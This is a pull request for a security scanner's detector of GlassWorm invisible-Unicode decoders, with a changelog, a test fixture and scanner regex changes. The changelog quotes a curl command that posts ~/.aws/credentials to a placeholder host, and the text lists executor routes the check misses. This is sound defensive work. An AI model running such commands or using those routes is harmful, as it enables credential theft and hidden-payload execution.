### PR TITLE
Narrow the UNICODE-STEGO-002 invisible corroborator to payload classes (#475)

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,30 @@ All notable changes to HackMyAgent are documented in this file.
 
 ## [Unreleased]
 
+### UNICODE-STEGO-002 corroborates invisible payloads only on the classes a decoder reconstitutes
+
+The GlassWorm decoder finding is CRITICAL only when a corroborator is present in
+the same file, one of which was too broad. The invisible-codepoint corroborator
+fired on any invisible character, so a lone zero-width char or a mid-file BOM
+lifted a decoder shape to CRITICAL — including a zero-width char used to escape a
+`**/` inside a JSDoc so the block comment does not close. That is a false CRITICAL
+on a file whose only invisible character is a benign zero-width escape and which
+carries no execution sink. Corroboration now requires a
+variation-selector or tag-character payload — the invisible classes this decoder
+shape (hex range `FE0x` / `E01xx`) actually reconstitutes; a single zero-width
+char is not a decodable string. `UNICODE-STEGO-001` still reports the zero-width
+char on its own as a HIGH lead.
+
+A decoder-shaped file whose only invisible character is a lone zero-width escape,
+with no execution sink and no variation-selector/tag payload, is now MEDIUM
+(`decoder shape, uncorroborated`) rather than CRITICAL. A real decoder — a
+variation-selector or tag payload in the file, or an `eval(`/`Function(` sink —
+stays CRITICAL. The execution-sink corroborator is unchanged. This does not close
+the known false-negative that a decoder reaching an executor through `vm`,
+`child_process`, `import()`, or an indirect `eval` is reported at MEDIUM, nor the
+false-positive that an `eval(` in a comment corroborates a decoder shape; both are
+comment-versus-code and dataflow work tracked upstream (#424).
+
 ### `secure` detects credential-file exfiltration in shell scripts (SHELL-EXFIL-001)
 
 A shell script whose only content was `curl -X POST https://host -d @~/.aws/credentials`

--- a/__tests__/hardening/unicode-stego.test.ts
+++ b/__tests__/hardening/unicode-stego.test.ts
@@ -652,7 +652,10 @@ describe('UNICODE-STEGO checks', () => {
       expect(stego001.length).toBe(1);
       expect(stego002.length).toBe(1);
       expect(stego002[0].severity).toBe('critical');
-      expect(stego002[0].message).toContain('invisible codepoints');
+      // The corroborator is the variation-selector/tag payload the decoder shape
+      // actually consumes, named precisely — a lone zero-width char does not lift
+      // this finding (see the payload-class defence-negative below).
+      expect(stego002[0].message).toContain('variation-selector or tag-character payload');
     });
 
     it('reports the earlier of the two signals, not the first .codePointAt', async () => {
@@ -766,6 +769,50 @@ describe('UNICODE-STEGO checks', () => {
       // MUST match it, or this test is measuring nothing.
       expect(REVERTED_GATE.test('  return String.fromCodePoint(...out);')).toBe(true);
       expect(REVERTED_GATE.test('  return String.fromCharCode(...out);')).toBe(true);
+    });
+
+    // #475 — the invisible corroborator fired on ANY invisible char, so a lone
+    // zero-width char (U+200B) lifted a decoder shape to CRITICAL. That is not the
+    // payload this shape reconstitutes (its range is FE0x / E01xx), and one benign
+    // use of a zero-width char is escaping a `**/` inside a JSDoc so the block
+    // comment does not close. Corroboration now requires a variation-selector or
+    // tag-character payload; a file whose only invisible is a lone zero-width
+    // escape, with no sink and no VS/tag payload, is a MEDIUM lead. UNICODE-STEGO-001
+    // still reports the zero-width char on its own (a HIGH lead; `.hmaignore` is the
+    // place to waive a known-benign comment escape).
+    it('does not escalate on a decoder shape whose only invisible is a lone zero-width char', async () => {
+      const content = Buffer.concat([
+        Buffer.from(
+          [
+            'function decode(input) {',
+            '  const out = [];',
+            '  for (let i = 0; i < input.length; i++) {',
+            '    const cp = input.codePointAt(i);',
+            '    if (cp >= 0xFE00 && cp <= 0xFE0F) { out.push(cp - 0xFE00); }',
+            '  }',
+            '  return String.fromCharCode(...out);',
+            '}',
+            'const note = "see the ',
+          ].join('\n')
+        ),
+        Buffer.from([0xE2, 0x80, 0x8B]), // U+200B, the only invisible char; no VS/tag payload
+        Buffer.from(' docs";\nmodule.exports = decode;\n'),
+      ]);
+      await fs.writeFile(path.join(tempDir, 'zw-only-shape.js'), content);
+
+      const findings = await scanForUnicodeStego();
+      const stego001 = findings.filter(
+        (f) => f.checkId === 'UNICODE-STEGO-001' && f.file === 'zw-only-shape.js'
+      );
+      const stego002 = findings.filter(
+        (f) => f.checkId === 'UNICODE-STEGO-002' && f.file === 'zw-only-shape.js'
+      );
+
+      expect(stego001.length).toBe(1);
+      expect(stego001[0].severity).toBe('high');
+      expect(stego002.length).toBe(1);
+      expect(stego002[0].severity).toBe('medium');
+      expect(['critical', 'high']).not.toContain(stego002[0].severity);
     });
   });
 

--- a/src/hardening/scanner.ts
+++ b/src/hardening/scanner.ts
@@ -13413,16 +13413,22 @@ dist/
       // requires corroboration, and both corroborators are read from THIS file so a
       // finding's severity never depends on the order the tree is walked in:
       //   1. an execution sink here, so a decoded string can reach eval/Function;
-      //   2. UNICODE-STEGO-001 fired here, so the invisible payload that a decoder
-      //      would decode is actually present in the same file.
-      // Neither holds for a test that builds a payload and asserts a sanitiser
-      // escapes it. That is a correct DEFENCE against this technique, and a check
-      // that grades a defence as the attack fires hardest on the people doing the
-      // right thing.
+      //   2. a variation-selector or tag-character payload here — the invisible
+      //      classes this decoder shape actually reconstitutes (its hex range is
+      //      FE0x / E01xx). A lone zero-width char or a mid-file BOM is NOT such a
+      //      payload: a single U+200B is not a decodable string, and one common
+      //      benign use is escaping a comment delimiter (a `**/` inside a JSDoc),
+      //      so corroborating on it grades a legitimate escape as the attack and
+      //      fires hardest on the people doing the right thing (#475). UNICODE-
+      //      STEGO-001 still reports the zero-width char on its own (a HIGH lead);
+      //      it just does not lift THIS decoder finding to CRITICAL.
+      // Neither corroborator holds for a test that builds a payload and asserts a
+      // sanitiser escapes it — a correct DEFENCE against this technique.
       const hasExecutionSink =
         /(?:^|[^\w.$])eval\s*\(/.test(content) ||
         /(?:^|[^\w.$])(?:new\s+)?Function\s*\(/.test(content);
-      const corroborated = hasExecutionSink || hasAnyInvisible;
+      const hasDecodablePayload = hasVariationSelectors || hasTagCharsIn001;
+      const corroborated = hasExecutionSink || hasDecodablePayload;
 
       if (hasCodePointAt && hasHexLiteral) {
         // Report the EARLIER of the two signals. Reporting the first `.codePointAt(`
@@ -13431,8 +13437,8 @@ dist/
         const reportedLine = Math.min(codePointAtLine, hexLiteralLine);
         const corroboration = hasExecutionSink
           ? 'an execution sink (eval/Function) in the same file'
-          : hasAnyInvisible
-            ? 'invisible codepoints present in the same file (UNICODE-STEGO-001)'
+          : hasDecodablePayload
+            ? 'a variation-selector or tag-character payload in the same file (UNICODE-STEGO-001)'
             : null;
         // Say what was actually observed. A file that only READS codepoints must not
         // be described as reconstituting them; that sentence would be false about the
@@ -13446,7 +13452,7 @@ dist/
           name: 'GlassWorm Decoder Pattern Detected',
           description: corroboration
             ? `Source file ${act} Unicode variation selector or tag character codepoints AND carries corroborating evidence - this is the decoder half of a GlassWorm attack`
-            : `Source file ${act} Unicode variation selector or tag character codepoints. This is the shape of a GlassWorm decoder, but neither corroborator this check recognises is present - no literal eval( or Function( call, and no invisible codepoints`,
+            : `Source file ${act} Unicode variation selector or tag character codepoints. This is the shape of a GlassWorm decoder, but neither corroborator this check recognises is present - no literal eval( or Function( call, and no variation-selector or tag-character payload`,
           category: 'unicode-stego',
           severity: corroborated ? 'critical' : 'medium',
           passed: false,
@@ -13461,7 +13467,7 @@ dist/
             : `sed -n '${Math.max(1, reportedLine - 5)},${reportedLine + 20}p' ${shellEscape(relativePath)}   # confirm this decodes for inspection, not for execution`,
           guidance: corroboration
             ? `The GlassWorm attack hides a payload in invisible Unicode characters and rebuilds it at runtime from their codepoints. This file ${act} those codepoints AND carries corroborating evidence, so treat it as live until traced. Follow the value from the range literal to whatever consumes it.`
-            : `This file ${act} codepoints in the variation selector or tag range. Sanitisers, linters, width calculators and tests for this attack all legitimately do the same thing, which is why this is a lead rather than a verdict. What was actually checked, stated narrowly on purpose: no literal eval( or Function( call appears in this file, and UNICODE-STEGO-001 did not fire on it. Neither is a statement about the class. A decoded string can reach an executor through vm, child_process, a dynamic import(), a member expression such as globalThis.eval, or the Function constructor reached through a prototype chain, and this check recognises none of those - so read the file rather than trusting this line. Reconstitution likewise has many spellings (an alias, a destructured binding, .map, Buffer.from, TextDecoder), so its absence from the message above is not proof the file does not rebuild a string.`,
+            : `This file ${act} codepoints in the variation selector or tag range. Sanitisers, linters, width calculators and tests for this attack all legitimately do the same thing, which is why this is a lead rather than a verdict. What was actually checked, stated narrowly on purpose: no literal eval( or Function( call appears in this file, and no variation-selector or tag-character payload - the invisible classes this shape decodes - is present (a lone zero-width char or a mid-file BOM, which UNICODE-STEGO-001 may still report on its own, does not corroborate this finding). Neither is a statement about the class. A decoded string can reach an executor through vm, child_process, a dynamic import(), a member expression such as globalThis.eval, or the Function constructor reached through a prototype chain, and this check recognises none of those - so read the file rather than trusting this line. Reconstitution likewise has many spellings (an alias, a destructured binding, .map, Buffer.from, TextDecoder), so its absence from the message above is not proof the file does not rebuild a string.`,
         });
       }
 


### PR DESCRIPTION
Closes #475's invisible-corroborator sub-item.

## The fix

The GlassWorm decoder finding (UNICODE-STEGO-002) lifts from MEDIUM to CRITICAL on a corroborator in the same file. The invisible-codepoint corroborator fired on **any** invisible character (`hasAnyInvisible`), so a lone zero-width char or a mid-file BOM lifted a decoder shape to CRITICAL — a false CRITICAL on defensive code, including a zero-width char used to escape a `**/` inside a JSDoc so the block comment does not close.

Corroboration now requires a **variation-selector or tag-character payload** — the invisible classes this decoder shape (hex range `FE0x` / `E01xx`) actually reconstitutes. A single zero-width char is not a decodable string, so it no longer corroborates. `UNICODE-STEGO-001` still reports the zero-width char on its own as a HIGH lead.

Net effect: a decoder-shaped file whose only invisible is a lone zero-width escape, with no execution sink and no VS/tag payload, is now MEDIUM (`decoder shape, uncorroborated`) rather than CRITICAL. A real decoder — a VS/tag payload, or an `eval(`/`Function(` sink — stays CRITICAL.

## What this corrects about #475

#475 sub-item 1 attributed the scanner.ts self-flag to the execution-sink corroborator (an `eval` in a doc comment + a `/new\s+Function\s*\(/` regex literal). Measured, that is incomplete: the regex literal does not trigger the corroborator (its literal `\s` backslashes block the match), and the self-flag is corroborated by the **invisible** corroborator (a lone zero-width char) — which this change fixes. The sink-in-comment precision (distinguishing a comment `eval(` from a code `eval(`) is genuinely a comment-vs-code / dataflow problem and moves to **#424**, together with #475's false-negative table (`vm` / `globalThis.eval` / indirect eval).

## Why the execution sink is unchanged

An earlier draft of this branch also masked comments and strings before the sink test, to drop the eval-in-comment false positive. The adversarial detection-change review found that masker introduced a **real, attacker-controllable false negative**: a `str.replace(/won't/g, ''); eval(...)` line has the apostrophe in the regex literal toggle the masker's string state and blank the real `eval(`, dropping a live decoder to MEDIUM and the scan to exit 0. Per the CSR re-ruling (COUNCIL_LEDGER 2026-08-24), the masker was **withdrawn** — a false negative that passes malware is categorically worse than a niche, `.hmaignore`-masked, safe-direction false positive, and sound comment/string stripping needs the regex-vs-division disambiguation that belongs with #424's AST. The sink stays a whole-file regex, which is false-negative-safe by construction (no lexer state to mis-toggle). The eval-in-comment false positive on our own source stays `.hmaignore`-masked, exactly as before this change.

Filed **#599** for the adjacent pre-existing blind spot: `isMatchInsideStringLiteral` (which gates the NEMO-009 bare/indirect `eval()` detectors) shares the same regex-literal blind spot on `main` today.

## Verification

- `secure --ci` on the withdrawn-masker's own false-negative fixture (`str.replace(/won't/g,''); eval(...)`) now scores CRITICAL, exit 1 (the hole is closed; a whole-file regex cannot miss a real sink).
- A decoder shape whose only invisible is a lone zero-width char → MEDIUM; a variation-selector/tag payload → CRITICAL; a real `eval`/`Function` sink → CRITICAL.
- `unicode-stego` suite green (adds a lone-zero-width defence-negative; the VS-payload positive re-pinned to the precise corroboration wording). Full suite green; `release-smoke:corpus` green (no benign fixture flips to CRITICAL, no real-sink fixture drops).
- The Item-2 mutation (revert to `hasAnyInvisible`) reds the defence-negative.
